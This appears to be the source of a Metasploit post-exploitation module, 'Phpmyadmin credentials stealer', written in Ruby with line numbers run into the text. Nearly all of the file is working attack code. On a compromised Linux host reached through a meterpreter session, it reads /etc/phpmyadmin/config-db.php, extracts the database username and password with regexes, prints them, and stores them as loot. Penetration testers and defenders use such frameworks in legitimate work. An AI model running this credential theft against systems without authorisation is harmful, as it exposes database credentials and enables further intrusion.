Path: blob/master/modules/post/linux/gather/phpmyadmin_credsteal.rb
19664 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Post67include Msf::Post::File8include Msf::Post::Linux::Priv9include Msf::Post::Linux::System1011def initialize(info = {})12super(13update_info(14info,15'Name' => 'Phpmyadmin credentials stealer',16'Description' => %q{17This module gathers Phpmyadmin creds from target linux machine.18},19'License' => MSF_LICENSE,20'Platform' => ['linux'],21'SessionTypes' => ['meterpreter'],22'Author' => [23'Chaitanya Haritash [bofheaded]',24'Dhiraj Mishra <[email protected]>'25],26'Notes' => {27'Stability' => [CRASH_SAFE],28'SideEffects' => [],29'Reliability' => []30}31)32)33end3435def parse_creds(contents)36db_user = contents.scan(/\$dbuser\s*=\s*['"](.*)['"];/).flatten.first37db_pass = contents.scan(/\$dbpass\s*=\s*['"](.*)['"];/).flatten.first3839unless db_user && db_pass40print_error("Couldn't find PhpMyAdmin credentials")41return42end4344print_good("User: #{db_user}")45print_good("Password: #{db_pass}")4647print_status('Storing credentials...')48store_valid_credential(user: db_user, private: db_pass)49end5051def run52print_line("\nPhpMyAdmin Creds Stealer!\n")5354if session.platform.include?('windows')55print_error('This module is not compatible with windows')56return57end5859conf_path = '/etc/phpmyadmin/config-db.php'60unless file_exist?(conf_path)61print_error("#{conf_path} doesn't exist on target")62return63end6465print_good('PhpMyAdmin config found!')66res = read_file(conf_path)67unless res68print_error('You may not have permissions to read the file.')69return70end7172print_good('Extracting creds')73parse_creds(res)7475p = store_loot('phpmyadmin_conf', 'text/plain', session, res, 'phpmyadmin_conf.txt', 'phpmyadmin_conf')76print_good("Config file located at #{p}")77end78end798081